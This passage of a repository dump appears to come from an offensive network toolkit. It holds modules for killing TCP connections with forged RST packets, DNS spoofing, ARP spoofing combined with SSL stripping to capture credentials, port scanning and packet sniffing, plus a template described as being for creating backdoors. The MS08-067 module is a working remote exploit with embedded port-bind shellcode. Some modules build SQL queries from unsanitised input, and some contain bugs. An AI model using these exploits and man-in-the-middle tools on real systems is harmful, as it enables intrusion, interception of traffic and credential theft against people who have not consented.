108 |         self.verbose = args["verbose"]
109 |         self.noisy = args["noisy"]
110 |         self.randomize = args["randomize"]
111 | 
112 |         self.VERBOSE = False
113 |         self.allow = self.allow_source = self.allow_destination = []
114 |         self.target = self.target_source = self.target_destination = []
115 |         self.aports = self.allow_sport = self.allow_dport = []
116 |         self.tports = self.target_sport = self.target_dport = []
117 |         self.ranges = {}
118 | 
119 |         self.allow = validate_ips(args["allow"])
120 |         self.allow_src = validate_ips(args["allow_source"])
121 |         self.allow_dst = validate_ips(args["allow_destination"])
122 |         self.target = validate_ips(args["target"])
123 |         self.target_src = validate_ips(args["target_source"])
124 |         self.target_dst = validate_ips(args["target_destination"])
125 | 
126 |         self.allow_ports = validate_ports(args["allow_port"])
127 |         self.allow_sport = validate_ports(args["allow_source_port"])
128 |         self.allow_dport = validate_ports(args["allow_destination_port"])
129 |         self.target_ports = validate_ports(args["target_port"])
130 |         self.target_sport = validate_ports(args["target_source_port"])
131 |         self.target_dport = validate_ports(args["target_destination_port"])
132 |         self.args = args
133 |         self.stop_sniffing = False
134 |         try:
135 |             self.s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
136 |         except:
137 |             print BAD + "Raw sockets are unavailable on this platform. Exiting."
138 |             return None
139 |         print("[*] Initialized tcpkiller on %s in %s mode, targeting %s%s. Press Ctrl-C to exit." %(self.iface, ("noisy" if self.noisy else "quiet"), (args["randomize"]), (" with verbosity enabled" if self.verbose else "")))
140 |         if self.allow:
141 |             print("[*] Allowing all connections involving " + ", ".join(self.allow))
142 |         if self.allow_src:
143 |             print("[*] Allowing all connections originating from " + ", ".join(self.allow_src))
144 |         if self.allow_dst:
145 |             print("[*] Allowing all connections coming from " + ", ".join(self.allow_dst))
146 | 
147 |         if self.target:
148 |             print("[*] Targeting all connections involving " + ", ".join(self.target))
149 |         if self.target_src:
150 |             print("[*] Targeting all connections originating from " + ", ".join(self.target_src))
151 |         if self.target_dst:
152 |             print("[*] Targeting all connections coming from " + ", ".join(self.target_dst))
153 | 
154 |         if self.allow_ports:
155 |             print("[*] Allowing all connections involving " + ", ".join(self.allow_ports))
156 |         if self.allow_sport:
157 |             print("[*] Allowing all connections originating from " + ", ".join(self.allow_sport))
158 |         if self.allow_dport:
159 |             print("[*] Allowing all connections coming from " + ", ".join(self.allow_dport))
160 | 
161 |         if self.target_ports:
162 |             print("[*] Targeting all connections involving " + ", ".join(self.target_ports))
163 |         if self.target_sport:
164 |             print("[*] Targeting all connections originating from " + ", ".join(self.target_sport))
165 |         if self.target_dport:
166 |             print("[*] Targeting all connections coming from " + ", ".join(self.target_dport))
167 |         return True
168 | 
169 |     ###############################################################
170 |     # Packet Handling                                             #
171 |     ###############################################################
172 | 
173 |     # Given command line arguements, method determines if this packet should be responded to
174 |     def ignore_packet(self, packet, proto):
175 |         src_ip = packet[proto].src
176 |         dst_ip = packet[proto].dst
177 |         src_port = packet[TCP].sport
178 |         dst_port = packet[TCP].dport
179 | 
180 |         # Target or allow by IP
181 |         if (src_ip in self.allow or dst_ip in self.allow) or (src_ip in self.allow_src) or (dst_ip in self.allow_dst):
182 |             return True
183 |         elif (self.target and ( self.src_ip not in self.target and self.dst_ip not in self.target)) or (self.target_src and not src_ip in self.target_src) or (self.target_dst and not dst_ip in self.target_dst):
184 |             return True
185 | 
186 |         # Target or allow by Port
187 |         if (src_port in self.allow_ports or dst_port in self.allow_ports) or (src_port in self.allow_sport) or (dst_port in self.allow_dport):
188 |             return True
189 |         elif (self.target_ports and (not src_port in self.target_ports and not dst_port in self.target_ports)) or (self.target_sport and not src_port in self.target_sport) or (self.target_dport and not dst_port in self.target_dport):
190 |             return True
191 | 
192 |         # Target randomly
193 |         if self.randomize == "often" and randint(1, 10) < 2:
194 |             return True
195 |         elif self.randomize == "half" and randint(1, 10) < 5:
196 |             return True
197 |         elif self.randomize == "seldom" and randint(1, 10) < 8:
198 |             return True
199 |         else:
200 |             return False
201 | 
202 | 
203 |     ###############################################################
204 |     # Scapy                                                       #
205 |     ###############################################################
206 | 
207 |     def send(self, packet):
208 |         self.s.send(packet)
209 | 
210 |     def build_packet(self, src_mac, dst_mac, src_ip, dst_ip, src_port, dst_port, seq, proto):
211 |         eth = Ether(src=src_mac, dst=dst_mac, type=0x800)
212 |         if proto == IP:
213 |             ip = IP(src=src_ip, dst=dst_ip)
214 |         elif proto == IPv6:
215 |             ip = IPv6(src=src_ip, dst=dst_ip)
216 |         else:
217 |             return str(eth) #if unknown L2 protocol, send back dud ether packet
218 |         tcp = TCP(sport=src_port, dport=dst_port, seq=seq, flags="R")
219 |         return str(eth/ip/tcp)
220 | 
221 |     def callback(self, packet):
222 |         flags = packet.sprintf("%TCP.flags%")
223 |         proto = IP
224 |         if IPv6 in packet:
225 |             proto = IPv6
226 |         if flags == "A" and not self.ignore_packet(packet, proto):
227 |             src_mac = packet[Ether].src
228 |             dst_mac = packet[Ether].dst
229 |             src_ip = packet[proto].src
230 |             dst_ip = packet[proto].dst
231 |             src_port = packet[TCP].sport
232 |             dst_port = packet[TCP].dport
233 |             seq = packet[TCP].seq
234 |             ack = packet[TCP].ack
235 |             if self.verbose:
236 |                 print("RST from %s:%s (%s) --> %s:%s (%s) w/ %s" % (src_ip, src_port, src_mac, dst_ip, dst_port, dst_mac, ack))
237 |             if self.noisy:
238 |                 self.send(self.build_packet(src_mac, dst_mac, src_ip, dst_ip, src_port, dst_port, seq, proto))
239 |             self.send(self.build_packet(dst_mac, src_mac, dst_ip, src_ip, dst_port, src_port, ack, proto))
240 | 
241 |     def stop_cond(self, _):
242 |         return self.stop_sniffing
243 | 
244 |     def launch(self):
245 |         success = self.setup()
246 |         if not success:
247 |             return
248 |         self.s.bind((self.iface, 0))
249 | 
250 |         conf.sniff_promisc = True
251 |         sniff(filter='tcp', prn=self.callback, store=0, stop_filter=self.stop_cond)
252 | 
253 | 


--------------------------------------------------------------------------------
/capabilities/exploitation/dnsSpoof.py:
--------------------------------------------------------------------------------
 1 | from capability import *
 2 | from scapy.all import *
 3 | import os
 4 | from netfilterqueue import NetfilterQueue
 5 | 
 6 | class dnsSpoof(Capability):
 7 |     prompt = Fore.RED + "DNS Spoof" + Fore.BLUE + ">> " + Fore.RESET
 8 | 
 9 |     def __init__(self, core):
10 |         super(dnsSpoof, self).__init__(core)
11 |         self.intro = GOOD + "Using DNS Spoof module..."
12 |         self.core = core
13 |         self.name = "DNS Spoof"
14 |         self.options = { 
15 |                 "target":   Option("target", "10.0.0.57", "target of attack", True),
16 |                 "site":     Option("site", "www.google.com", "site to spoof", True),
17 |                 "new_site": Option("new_site", "www.bing.com", "site to send users to", True),
18 |                 }
19 |         self.allow_modules = True
20 |         self.modules = {}
21 |         self.help_text = "Spoofs a certain address of a target."
22 | 
23 |     def callback(self, packet):
24 |         payload = packet.get_payload()
25 |         pkt = IP(payload)
26 |         if not pkt.haslayer(DNSQR):
27 |             packet.accept()
28 |         else:
29 |             if self.domain in pkt[DNS].qd.qname:
30 |                 packet.accept()
31 |             else:
32 |                 packet.accept()
33 | 
34 |     def begin(self):
35 |         q = NetfilterQueue()
36 |         q.bind(1, self.callback)
37 |         try:
38 |             q.run() # Main loop
39 |         except KeyboardInterrupt:
40 |             q.unbind()
41 |             os.system('iptables -F')
42 |             os.system('iptables -X')
43 | 
44 | 
45 |     def launch(self):
46 |         os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE --queue-num 1')
47 |         self.domain = self.get_value("site")
48 |         self.localIP = self.get_value("target")
49 |         self.new_site = self.get_value("new_site")
50 |         self.begin()
51 | 


--------------------------------------------------------------------------------
/capabilities/exploitation/ms08.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | #############################################################################
  3 | #   MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)
  4 | #############################################################################
  5 | 
  6 | import struct
  7 | import sys
  8 | 
  9 | from threading import Thread
 10 | from impacket import smb, uuid
 11 | from impacket.dcerpc.v5 import transport
 12 | from capability import *
 13 | 
 14 | 
 15 | # Portbind shellcode from metasploit; Binds port to TCP port 4444
 16 | shellcode  = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
 17 | shellcode += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9"
 18 | shellcode += "\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56"
 19 | shellcode += "\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22"
 20 | shellcode += "\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30"
 21 | shellcode += "\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81"
 22 | shellcode += "\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42"
 23 | shellcode += "\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22"
 24 | shellcode += "\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9"
 25 | shellcode += "\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79"
 26 | shellcode += "\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab"
 27 | shellcode += "\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa"
 28 | shellcode += "\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48"
 29 | shellcode += "\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1"
 30 | shellcode += "\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0"
 31 | shellcode += "\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe"
 32 | shellcode += "\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9"
 33 | shellcode += "\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84"
 34 | shellcode += "\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56"
 35 | shellcode += "\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8"
 36 | shellcode += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79"
 37 | shellcode += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6"
 38 | shellcode += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9"
 39 | 
 40 | # Payload for Windows 2000 target
 41 | payload_1 = '\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00'
 42 | payload_1 += '\x41\x41\x41\x41\x41\x41\x41\x41'
 43 | payload_1 += '\x41\x41\x41\x41\x41\x41\x41\x41'
 44 | payload_1 += '\x41\x41'
 45 | payload_1 += '\x2f\x68\x18\x00\x8b\xc4\x66\x05\x94\x04\x8b\x00\xff\xe0'
 46 | payload_1 += '\x43\x43\x43\x43\x43\x43\x43\x43'
 47 | payload_1 += '\x43\x43\x43\x43\x43\x43\x43\x43'
 48 | payload_1 += '\x43\x43\x43\x43\x43\x43\x43\x43'
 49 | payload_1 += '\x43\x43\x43\x43\x43\x43\x43\x43'
 50 | payload_1 += '\x43\x43\x43\x43\x43\x43\x43\x43'
 51 | payload_1 += '\xeb\xcc'
 52 | payload_1 += '\x00\x00'
 53 | 
 54 | # Payload for Windows 2003[SP2] target
 55 | payload_2 = '\x41\x00\x5c\x00'
 56 | payload_2 += '\x2e\x00\x2e\x00\x5c\x00\x2e\x00'
 57 | payload_2 += '\x2e\x00\x5c\x00\x0a\x32\xbb\x77'
 58 | payload_2 += '\x8b\xc4\x66\x05\x60\x04\x8b\x00'
 59 | payload_2 += '\x50\xff\xd6\xff\xe0\x42\x84\xae'
 60 | payload_2 += '\xbb\x77\xff\xff\xff\xff\x01\x00'
 61 | payload_2 += '\x01\x00\x01\x00\x01\x00\x43\x43'
 62 | payload_2 += '\x43\x43\x37\x48\xbb\x77\xf5\xff'
 63 | payload_2 += '\xff\xff\xd1\x29\xbc\x77\xf4\x75'
 64 | payload_2 += '\xbd\x77\x44\x44\x44\x44\x9e\xf5'
 65 | payload_2 += '\xbb\x77\x54\x13\xbf\x77\x37\xc6'
 66 | payload_2 += '\xba\x77\xf9\x75\xbd\x77\x00\x00'
 67 | 
 68 | class MS08Exploit(Thread):
 69 |     def __init__(self, target, osver, port=445):
 70 |         super(MS08Exploit, self).__init__()
 71 |         self.__port = port
 72 |         self.target = target
 73 |         self.osver = osver
 74 |         if osver == '1':  # Windows 2000 Payload
 75 |             self.payload = payload_1
 76 |             print '[-]Windows 2000 payload loaded'
 77 |         if osver == '2':  # Windows 2003[SP2] Payload
 78 |             self.payload = payload_2
 79 |             print '[-]Windows 2003[SP2] payload loaded'
 80 | 
 81 |     def __DCEPacket(self):
 82 |         print '[-]Initiating connection'
 83 |         self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)
 84 |         self.__trans.connect()
 85 |         print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target
 86 |         self.__dce = self.__trans.DCERPC_class(self.__trans)
 87 |         self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
 88 | 
 89 |         # Constructing Malicious Packet
 90 |         self.__stub = '\x01\x00\x00\x00'
 91 |         self.__stub += '\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
 92 |         self.__stub += shellcode
 93 |         self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
 94 |         self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
 95 |         self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
 96 |         self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
 97 |         self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
 98 |         self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
 99 |         self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
100 |         self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
101 |         self.__stub += '\x00\x00\x00\x00'
102 |         self.__stub += '\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00'
103 |         self.__stub += self.payload
104 |         self.__stub += '\x00\x00\x00\x00'
105 |         self.__stub += '\x02\x00\x00\x00\x02\x00\x00\x00'
106 |         self.__stub += '\x00\x00\x00\x00\x02\x00\x00\x00'
107 |         self.__stub += '\x5c\x00\x00\x00\x01\x00\x00\x00'
108 |         self.__stub += '\x01\x00\x00\x00'
109 |         return
110 | 
111 |     def run(self):
112 |         self.__DCEPacket()
113 |         self.__dce.call(0x1f, self.__stub)  # 0x1f (or 31)- NetPathCanonicalize Operation
114 |         print '[-]Exploit sent to target successfully...\n[1]Telnet to port 4444 on target machine...'
115 | 
116 | 
117 | class MS08(Capability):
118 | 
119 |     def __init__(self, core):
120 |         super(MS08, self).__init__(core)
121 | 
122 |         self.options = {
123 |             "port":  Option("port", 135, "port to attack", True),
124 |             "target": Option("target", "0.0.0.0", "target of attack", True),
125 |             "version": Option("version", 1, "version of exploit to run (1 for Win2000, 2 for WinXP)", False),
126 |         }
127 |         self.core = core
128 |         self.__port = self.get_value("port")
129 |         self.target = self.get_value("target")
130 |         self.version = self.get_value("version")
131 |         self.help_text = "MS08 Exploit"
132 |         self.name = "MS08-067"
133 |     def launch(self):
134 |         MS08Exploit(self.target, self.version).start()
135 | 


--------------------------------------------------------------------------------
/capabilities/exploitation/sslstrip.py:
--------------------------------------------------------------------------------
 1 | from util_arp import *
 2 | import os
 3 | from capability import *
 4 | 
 5 | class sslstrip(Capability):
 6 | 
 7 |     def __init__(self, core):
 8 |         super(sslstrip, self).__init__(core)
 9 |         self.name = "SSL Strip"
10 |         self.options = {
11 |             "masq" : Option("masq", "", "ID of the computer to masquerade as", True),
12 |             "source": Option("source", "", "ID of the source computer", True),
13 |             "dest": Option("dest", "", "ID of the target", True),
14 |             "name": Option("name", "ssl_log", "File to log output of sslstrip", True),
15 |             }
16 |         self.help_text = INFO + "ARP Spoof, then strip SSL traffic, allowing us to see credentials."
17 | 
18 |     def exec_command(self, comm):
19 |         self.core.cur.execute(comm)
20 |         return self.core.cur.fetchall()[0][0]
21 | 
22 |     def getVars(self):
23 |         self.masq_ip = self.exec_command("SELECT IP FROM COMPUTERS WHERE ID = '{0}'".format(self.get_value("masq")))
24 |         self.masq_mac = self.exec_command("SELECT MAC FROM COMPUTERS WHERE ID = '{0}'".format(self.get_value("masq")))
25 |         self.source_ip = self.exec_command("SELECT IP FROM COMPUTERS WHERE ID = '{0}'".format(self.get_value("source")))
26 |         self.source_mac = self.exec_command("SELECT MAC FROM COMPUTERS WHERE ID = '{0}'".format(self.get_value("source")))
27 |         self.dest_ip = self.exec_command("SELECT IP FROM COMPUTERS WHERE ID = '{0}'".format(self.get_value("dest")))
28 |         self.dest_mac = self.exec_command("SELECT MAC FROM COMPUTERS WHERE ID = '{0}'".format(self.get_value("dest")))
29 | 
30 |     def arpGo(self):
31 |         os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
32 |         return arpBegin(self.masq_ip, self.masq_mac, self.source_mac, self.dest_ip, self.dest_mac)
33 |     
34 |     def restore(self):
35 |         self.getVars()
36 |         self.proc.terminate()
37 |         arpEnd(self.masq_ip, self.masq_mac, self.dest_ip, self.dest_mac)
38 |         os.system("killall sslstrip")
39 | 	os.system("iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000")
40 | 
41 | 
42 |     def launch(self):
43 |         self.getVars()
44 |         os.system("sslstrip -w " + str(self.get_value("name")) + " &")
45 |         self.proc = self.arpGo()
46 | 	os.system("iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000")
47 |         return self.proc
48 | 


--------------------------------------------------------------------------------
/capabilities/exploitation/util_arp.py:
--------------------------------------------------------------------------------
 1 | from scapy.all import *
 2 | import subprocess
 3 | import os
 4 | import multiprocessing
 5 | #masq_ip: ip we masquerade as.
 6 | #masc_mac: Masqueraded mac address
 7 | #source_mac: Our mac address
 8 | #Dest IP: target ip
 9 | #Dest Mac: target mac address
10 | #ex: arpDos("10.0.0.1", "00:0c:29:5f:e7:50", "b8:27:eb:c2:1c:52", "10.0.0.57", "00:0c:29:08:45:1a")
11 | 
12 | def arpSend(masq_ip, masq_mac, source_mac, dest_ip, dest_mac):
13 |     packet = ARP()
14 |     packet.op = 2
15 |     packet.psrc = masq_ip
16 |     packet.pdst = dest_ip
17 |     packet.hwdst = dest_mac
18 |     packet.hwsrc = source_mac
19 |     send(packet)
20 |     while True:
21 |         send(packet)
22 |         sniff(filter="arp and host " + masq_ip, count=1)
23 | 
24 | def arpBegin(masq_ip, masq_mac, source_mac, dest_ip, dest_mac):
25 |     proc= multiprocessing.Process(target=arpSend, args=(masq_ip, masq_mac, source_mac, dest_ip, dest_mac))
26 |     proc.start()
27 |     return proc
28 | 
29 | def arpEnd(masq_ip, masq_mac, dest_ip, dest_mac):
30 |     packet = ARP()
31 |     packet.op = 2
32 |     packet.psrc = masq_ip
33 |     packet.pdst = dest_ip
34 |     packet.hwdst = dest_mac
35 |     packet.hwsrc = masq_mac
36 |     send(packet)
37 | 


--------------------------------------------------------------------------------
/capabilities/interface.py:
--------------------------------------------------------------------------------
  1 | import cmd
  2 | import subprocess
  3 | import math
  4 | import shlex
  5 | import importlib
  6 | import inspect
  7 | import sys
  8 | import os
  9 | 
 10 | from option import *
 11 | from colorama import *
 12 | 
 13 | GOOD = Fore.GREEN + " + " + Fore.RESET
 14 | BAD = Fore.RED + " - " + Fore.RESET
 15 | WARN = Fore.YELLOW + " * " + Fore.RESET
 16 | INFO = Fore.BLUE + " + " + Fore.RESET
 17 | 
 18 | 
 19 | class CapabilityInterface(cmd.Cmd):
 20 |     
 21 |     def __init__(self, core, capability):
 22 |         cmd.Cmd.__init__(self)
 23 |         self.capability = capability
 24 |         self.core = core
 25 |         self.help_text = None
 26 |         self.prompt = Fore.RED + "("+self.capability.name+") " + Fore.BLUE + ">> " + Fore.RESET
 27 | 
 28 |     def complete_set(self, text, line, begin_index, end_index):
 29 |         line = line.rsplit(" ")[1]
 30 |         return [item for item in (self.capability.options.keys()) if item.startswith(text)]
 31 |     
 32 |     def do_launch(self, args):
 33 |         print GOOD + "Launching %s..." % (self.capability.name)
 34 |         self.capability.launch()
 35 |         return False
 36 | 
 37 |     def do_restore(self, args):
 38 |         print GOOD + "Restoring target..."
 39 |         self.capability.restore()
 40 |         return False
 41 | 
 42 |     def do_show(self, args):
 43 |         if args == "options":
 44 |             self.do_help(args)
 45 |         elif args == "modules":
 46 |             self.mods()
 47 |         else:
 48 |             print BAD + "Unknown option %s", args
 49 |     
 50 |     def do_set(self, args):
 51 |         args = shlex.split(args)
 52 |         bad_opt = BAD + "Unknown option %s" % args[0]
 53 |         if len(args) == 2 and args[0] in self.capability.options:  # TODO technically redundant
 54 |             self.capability.set_option(args[0].lower(), args[1])
 55 |             print(GOOD + "%s => %s" % (args[0], args[1]))
 56 |         elif len(args) != 2:
 57 |             print(BAD + "Usage: \"set <OPTION> <VALUE>\"")
 58 |         else:
 59 |             print(bad_opt)
 60 | 
 61 |     def exec_command(self, comm):
 62 |         self.core.cur.execute(comm)
 63 |         return self.core.cur.fetchall()[0][0]
 64 | 
 65 |     def get_value(self, name):
 66 |         if name in self.options:
 67 |             return self.options[name].value
 68 |         else:
 69 |             return None
 70 | 
 71 |     def check_by_name(self, name):
 72 |         for mod in self.modules:
 73 |             if name.lower() == mod.name.lower():
 74 |                 return True
 75 |         return False
 76 | 
 77 |     def do_EOF(self, line):
 78 |         print ""
 79 |         return True
 80 | 
 81 |     def emptyline(self):
 82 |         return
 83 | 
 84 |     def precmd(self, line):
 85 |         self._hist += [ line.strip() ]
 86 |         return line
 87 | 
 88 |     def do_history(self, args):
 89 |         print self._hist
 90 | 
 91 |     def do_exit(self, args):
 92 |         return True
 93 | 
 94 |     def do_quit(self, args):
 95 |         return True
 96 | 
 97 |     def default(self, line):
 98 |         self.core.onecmd(line)
 99 | 
100 |     def print_help(self, options):
101 |         if options == {}:
102 |             return
103 |         vals = [str(o.value) for o in options.values()]
104 |         l = int(math.ceil(max(map(len, vals)) / 10.0)) * 10
105 |         print(("{0:<15} {1:<%s} {2:<30}" % str(l)).format("Option","Value", "Description"))
106 |         print "="*(l+45)
107 |         for name, opt in options.iteritems():
108 |             print(("{0:<15} {1:<%s} {2:<30}" % str(l)).format(opt.name, opt.value, opt.description))
109 | 
110 |     def do_help(self, args):
111 |         if self.help_text != None and self.help_text != "":
112 |             print self.help_text
113 |         self.print_help(self.capability.options) 
114 |     
115 |     def preloop(self):
116 |         cmd.Cmd.preloop(self)   ## sets up command completion
117 |         self._hist    = []      ## No history yet
118 |         self._locals  = {}      ## Initialize execution namespace for user
119 |         self._globals = {}
120 | 


--------------------------------------------------------------------------------
/capabilities/option.py:
--------------------------------------------------------------------------------
1 | class Option():
2 | 
3 |     def __init__(self, name, value, description, required):
4 |         self.name = name
5 |         self.value = value
6 |         self.description = description
7 |         self.required = required
8 | 


--------------------------------------------------------------------------------
/capabilities/scan/nmapScan.py:
--------------------------------------------------------------------------------
 1 | from capability import *
 2 | import nmap
 3 | from scapy.all import *
 4 | import pprint
 5 | 
 6 | class scanNmap(Capability):
 7 | 
 8 |     def __init__(self, core):
 9 |         super(scanNmap, self).__init__(core)
10 |         self.name = "Nmap"
11 |         self.intro = GOOD + "Using Nmap module..."
12 |         self.core = core
13 |         self.options = {
14 |                 "host":     Option("host", "10.0.0.57", "host to scan", True),
15 |                 "ports":    Option("ports", "0-1000", "ports to scan", True),
16 |                 }
17 |         self.help_text = "Use this to scan as you would in nmap."
18 | 
19 | 
20 |     def launch(self):
21 |         scanner = nmap.PortScanner()
22 |         results = scanner.scan(self.get_value("host"), self.get_value("ports"))
23 |         pp = pprint.PrettyPrinter(indent=4)
24 |         pp.pprint(results["nmap"])
25 |         pp.pprint(results["scan"])
26 | 


--------------------------------------------------------------------------------
/capabilities/scan/syn.py:
--------------------------------------------------------------------------------
 1 | from capability import *
 2 | from scapy.all import *
 3 | import time
 4 | import datetime
 5 | 
 6 | class syn(Capability):
 7 | 
 8 |     def __init__(self, core):
 9 |         super(syn, self).__init__(core)
10 |         self.name = "Syn Scan"
11 |         self.intro = GOOD + "Using Syn Scan module..."
12 |         self.core = core
13 |         self.options = { 
14 |                 "target":   Option("target", "10.0.0.57", "target device to scan", True),
15 |                 "start":    Option("start", "0", "beginning port of scan", True),
16 |                 "end":      Option("end", "100", "ending port of range", True),
17 |                 }
18 |         self.help_text = "Scans a computer on a specific port."
19 | 
20 |     def syn_scan(self, target, ports):
21 |         ans,unans = sr(IP(dst=target)/TCP(dport=ports),timeout=.1,verbose=0)
22 |         rep = []
23 |         for s,r in ans:
24 |             if not r.haslayer(ICMP):
25 |                 if r.payload.flags == 0x12:
26 |                     rep.append(r.sprintf("%sport%"))
27 |         for response in rep:
28 |             print str(response) + " is open"
29 | 
30 |         print "Updating database..."
31 |         ts = time.time()
32 |         st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
33 |         ports = ','.join(rep)
34 |         self.core.cur.execute(" \
35 |             UPDATE computers SET ip='{0}', ports='{1}', last_online='{2}' WHERE ip='{3}'; \
36 |             INSERT INTO computers(ip,ports,last_online) SELECT '{4}', '{5}', '{6}' \
37 |             WHERE NOT EXISTS (SELECT 1 FROM computers WHERE ip='{7}')" \
38 |             .format(target, ports, st, target, target, ports, st, target))
39 | 
40 |         return rep
41 | 
42 |     def launch(self):
43 |         self.syn_scan(self.get_value("target"), (int(self.get_value("start")), int(self.get_value("end"))))
44 | 
45 | 
46 | 
47 | 


--------------------------------------------------------------------------------
/capabilities/sniff/sniffPack.py:
--------------------------------------------------------------------------------
 1 | from scapy.all import *
 2 | import time
 3 | import datetime
 4 | import thread
 5 | import os
 6 | from capability import *
 7 | 
 8 | class sniffPack(Capability):
 9 | 
10 |     def __init__(self, core):
11 |         super(sniffPack, self).__init__(core)
12 |         self.name = "Sniff"
13 |         self.intro = GOOD + "Using Sniff module..."
14 |         self.core = core
15 |         self.options = { 
16 |                 "rate": Option("rate", "30", "number of seconds in between file writes", True),
17 |                 "folder": Option("folder", "/home/aces/pina-colada/packets/", "name of folder to save packets", True),
18 |                 }
19 |         self.help_text = "Sniffs all packets and stores them in a directory."
20 | 
21 |     def listen(self):
22 |         while True:
23 |             try:
24 |                 pkts = sniff(timeout=float(self.get_value("rate")))
25 |                 ts = time.time()
26 |                 st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
27 |                 wrpcap(str(self.get_value("folder")) + str(st) + ".pcap", pkts)
28 |             except Exception as e:
29 |                 print "failure"
30 |                 print e
31 | 
32 |     def restore(self):
33 |         pass
34 | 
35 |     def launch(self):
36 |         os.system("mkdir " + str(self.get_value("folder")))
37 |         try:
38 |             thread.start_new_thread (self.listen, ()) 
39 |         except Exception as e:
40 |             print "Thread creation failed"
41 |             print e
42 | 


--------------------------------------------------------------------------------
/capabilities/template.py:
--------------------------------------------------------------------------------
 1 | #This is the template to create backdoors. Please copy your backdoor into the suggested spots. Places you need to input are shown by ~tildes~.
 2 | from capability import *
 3 | #Remember extra imports.
 4 | 
 5 | class ~NAME~(Capability):
 6 | 
 7 |     def __init__(self, core):
 8 |         super(~NAME~, self).__init__(core)
 9 |         self.name = "~NAME~"
10 |         self.intro = GOOD + "Using ~NAME~ module..."
11 |         self.core = core
12 |         self.options = { #~Input extra options. You almost always need a port.~
13 |                 #example: "hi":  Option("hi", "default", description", True),
14 |                 }
15 |         self.help_text = ""
16 | 
17 |     def restore(self):
18 | 
19 |     def launch(self):
20 | 	#~Add all commands needed to run the program.~
21 | 
22 | #After you have filled out this entire program, move it to the correct folder. 
23 | 
24 | 
25 | 
26 | 


--------------------------------------------------------------------------------
/cert/server.crt:
--------------------------------------------------------------------------------
 1 | -----BEGIN CERTIFICATE-----
 2 | MIIDXjCCAkYCCQDuHG4iqwSUUjANBgkqhkiG9w0BAQUFADBxMQswCQYDVQQGEwJB
 3 | VTETMBEGA1UECBMKU29tZS1TdGF0ZTEhMB8GA1UEChMYSW50ZXJuZXQgV2lkZ2l0
 4 | cyBQdHkgTHRkMRQwEgYDVQQLEwtQaW5hIENvbGFkYTEUMBIGA1UEAxMLUGluYSBD
 5 | b2xhZGEwHhcNMTYxMjAzMTk1MzMxWhcNMTcxMjAzMTk1MzMxWjBxMQswCQYDVQQG
 6 | EwJBVTETMBEGA1UECBMKU29tZS1TdGF0ZTEhMB8GA1UEChMYSW50ZXJuZXQgV2lk
 7 | Z2l0cyBQdHkgTHRkMRQwEgYDVQQLEwtQaW5hIENvbGFkYTEUMBIGA1UEAxMLUGlu
